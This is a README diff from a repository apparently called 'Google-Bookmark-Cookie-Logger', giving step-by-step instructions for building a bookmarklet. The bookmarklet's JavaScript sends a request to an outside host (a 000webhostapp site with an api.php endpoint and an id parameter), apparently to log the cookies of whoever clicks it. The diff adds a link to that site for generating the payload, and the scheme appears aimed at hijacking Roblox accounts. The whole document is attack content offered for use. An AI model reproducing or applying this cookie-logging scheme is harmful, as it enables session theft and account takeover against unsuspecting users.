leecade08/Google-Bookmark-Cookie-Logger/README.md

 3. Paste the code from down below in

-4.Delete PasteJavaHere and paste your own Javascript (dont have a javascript?, go to #javascript click on the site and make one)
+4.Delete PasteJavaHere and paste your own Javascript

+(dont have a javascript?, go to https://robloxclothingbeta.000webhostapp.com/index.html click on the site and make one)

 5. Delete the "" and replace with '' like this below "xJavascript:$.get("//robloxclothingbeta.000webhostapp.com/api.php?id=123456")" to "xJavascript:$.get('//robloxclothingbeta.000webhostapp.com/api.php?id=123456')"